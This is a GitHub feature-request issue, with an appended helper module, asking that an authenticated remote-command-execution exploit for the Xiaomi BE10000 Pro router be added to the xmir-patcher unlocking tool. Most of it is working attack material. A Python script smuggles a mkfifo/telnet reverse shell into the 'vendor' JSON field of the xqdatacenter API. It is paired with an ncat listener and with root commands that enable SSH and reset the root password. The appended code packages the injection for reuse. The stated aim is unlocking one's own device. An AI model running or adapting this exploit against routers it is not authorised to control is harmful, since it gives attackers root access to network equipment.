[Feature Request] Add support for Xiaomi Router BE10000 Pro via authorized remote RCE vulnerability #154

@Xierfei

Device Model

Xiaomi Router BE10000 Pro (小米路由器 BE10000 Pro)

Current Status

The xmir-patcher currently does not support the BE10000 Pro model. Existing methods (such as old firmware downgrades or specific exploit scripts) do not work on this device.

Discovery

I found a valid Authorized Remote Code Execution (RCE) vulnerability that works on the latest firmware of the BE10000 Pro. This vulnerability allows executing arbitrary commands with root privileges if a valid login token (stok) is provided.

Reference vulnerability analysis (Chinese): https://xz.aliyun.com/news/91619

Proof of Concept (PoC)

I have successfully verified this method to enable SSH on my BE10000 Pro. Below are the steps:

Prerequisites

  1. A computer on the same LAN as the router.
  2. A valid stok token from the router (usually obtained by logging into the web interface http://192.168.31.1 and extracting it from the URL).
  3. Python 3 with the requests library installed.
  4. ncat (from nmap) installed on the listening machine.

Step 1: Start Listener

On your computer, start a netcat listener to receive the reverse shell:

ncat -lvnp 8888

Step 2: Trigger RCE and Get Shell

Run the following Python script.
Note: Replace YOUR_STOK_TOKEN with your actual router token and YOUR_PC_IP with your computer's IP address.

import json
import requests

# Configuration
server_ip = "192.168.31.1"       # Router IP
token = "YOUR_STOK_TOKEN"        # REPLACE THIS with your actual stok
listener_ip = "192.168.31.7"     # REPLACE THIS with your PC's IP
listener_port = "8888"           # Must match the ncat listener from Step 1

# Payload: Reverse shell via telnet
# Using telnet because busybox on some firmwares might lack full netcat features,
# but mkfifo + telnet is a reliable standard method.
# The leading ';' terminates the command the firmware builds around the vendor
# value, and the trailing '#' comments out whatever it appends after it.
shell = f";mkfifo /tmp/f; telnet {listener_ip} {listener_port} 0</tmp/f 2>&1 | /bin/sh > /tmp/f; #"

# The injected string is carried in the "vendor" field of the JSON payload.
# json.dumps does the quoting so the envelope stays valid JSON whatever the
# shell string contains.
data = {
    'payload': json.dumps({"api": 7, "dev": "a", "vendor": shell, "type": "a"},
                          separators=(",", ":"))
}

url = f"http://{server_ip}/cgi-bin/luci/;stok={token}/api/xqdatacenter/request"

print(f"Sending payload to {url}...")
try:
    res = requests.post(url, data=data, timeout=10)
    print("Response:", res.text)
except Exception as e:
    # The request may not return while the reverse shell is still connected,
    # so a timeout here does not by itself mean the injection failed; check
    # the ncat listener from Step 1.
    print(f"Error: {e}")

Step 3: Enable SSH

Once you get the shell connection in your terminal from Step 1, run the following commands to enable SSH and set the root password:

# Enable services
nvram set ssh_en=1
nvram set telnet_en=1
nvram set uart_en=1
nvram set boot_wait=on
nvram commit

# Fix dropbear configuration (force debug channel if necessary)
sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear

# Restart dropbear
/etc/init.d/dropbear restart

# Set root password (change 'root' to your desired password)
echo -e 'root\nroot' | passwd root

After running these commands, you should be able to SSH into the router:

ssh root@192.168.31.1

Suggestion for xmir-patcher

Could you please integrate this exploitation method into xmir-patcher?
Since this relies on an authenticated RCE, the tool could:

  1. Prompt the user to log in via the web UI or input their password to retrieve the stok.
  2. Automatically inject the payload to enable SSH.
  3. This would provide a clean, software-based unlock solution for the BE10000 Pro.

Environment Details

  • Router Model: BE10000 Pro
  • Firmware Version: 1.0.70

Thank you for maintaining this great project!

PS: My English is not very good, so the content above was written with the assistance of AI. I hope the technical details are clear and helpful.
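The following helper packages the pieces the suggestion above asks xmir-patcher to automate: pulling the stok out of a logged-in web UI URL, building the reverse-shell string with validated listener values, and producing the exact URL and form body for the xqdatacenter/request call. It is an added example, not code from the issue author or from the xmir-patcher project. Two things in it are assumptions not stated on the page: that the stok is a 32-character hex string, and the sample URL with the constructed token `0123456789abcdef0123456789abcdef`. Nothing is sent unless `send=True` is passed, so it runs offline.

```python
"""Helpers for the stok-authenticated xqdatacenter/request injection.

Added example (not the issue author's or xmir-patcher's code).
Assumption: the stok is a 32-character hex string; the page only says it
is taken from the web UI URL.
"""
import ipaddress
import json
import re

# Logged-in web UI URLs look like
#   http://192.168.31.1/cgi-bin/luci/;stok=<token>/web/home
# The 32-hex-character length below is an assumption, not stated on the page.
STOK_RE = re.compile(r";stok=([0-9a-fA-F]{32})(?:/|$)")


def valid_stok(stok: str) -> bool:
    """True if the token matches the assumed 32-hex-character shape."""
    return STOK_RE.fullmatch(f";stok={stok}") is not None


def extract_stok(ui_url: str) -> str:
    """Pull the stok out of a logged-in web UI URL; raise if none is present."""
    m = STOK_RE.search(ui_url)
    if not m:
        raise ValueError("URL has no ;stok=<32 hex chars> segment")
    return m.group(1)


def reverse_shell_payload(listener_ip: str, listener_port: int) -> str:
    """The PoC's mkfifo + telnet reverse shell, with operator-supplied values
    validated so a typo cannot silently change the injected command."""
    ipaddress.ip_address(listener_ip)  # raises ValueError on malformed input
    if not 1 <= listener_port <= 65535:
        raise ValueError("listener_port out of range")
    # Leading ';' ends whatever command the firmware builds in front of the
    # vendor value; trailing '#' comments out whatever it appends after it.
    return (f";mkfifo /tmp/f; telnet {listener_ip} {listener_port} 0</tmp/f 2>&1"
            f" | /bin/sh > /tmp/f; #")


def build_request(router_ip: str, stok: str, shell: str) -> tuple[str, dict]:
    """Return (url, form_data) for the xqdatacenter/request call.

    json.dumps does the quoting, so '"' or '\\' in the injected string cannot
    break the JSON envelope the way hand-built concatenation can."""
    ipaddress.ip_address(router_ip)
    if not valid_stok(stok):
        raise ValueError("stok must be 32 hex characters")
    url = f"http://{router_ip}/cgi-bin/luci/;stok={stok}/api/xqdatacenter/request"
    body = {"api": 7, "dev": "a", "vendor": shell, "type": "a"}
    return url, {"payload": json.dumps(body, separators=(",", ":"))}


def trigger(router_ip: str, stok: str, listener_ip: str, listener_port: int,
            send: bool = False) -> tuple[str, dict]:
    """Build the request and, only if send=True, POST it to the router."""
    url, data = build_request(router_ip, stok,
                              reverse_shell_payload(listener_ip, listener_port))
    if send:
        import requests  # only needed when actually talking to the router
        try:
            # The call may not return while the reverse shell stays connected,
            # so a timeout here does not by itself mean the injection failed.
            requests.post(url, data=data, timeout=10)
        except requests.RequestException as exc:
            print("request ended:", exc)
    return url, data


if __name__ == "__main__":
    # Constructed sample URL; the token is a placeholder, not a real stok.
    sample_url = ("http://192.168.31.1/cgi-bin/luci/"
                  ";stok=0123456789abcdef0123456789abcdef/web/home")
    stok = extract_stok(sample_url)
    url, data = trigger("192.168.31.1", stok, "192.168.31.7", 8888)
    print(url)
    print(data["payload"])
```

Start the `ncat -lvnp 8888` listener from Step 1 first, then call `trigger(..., send=True)` with the real stok; the Step 3 commands are typed into the shell that arrives at the listener.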

Labels: enhancement (New feature or request)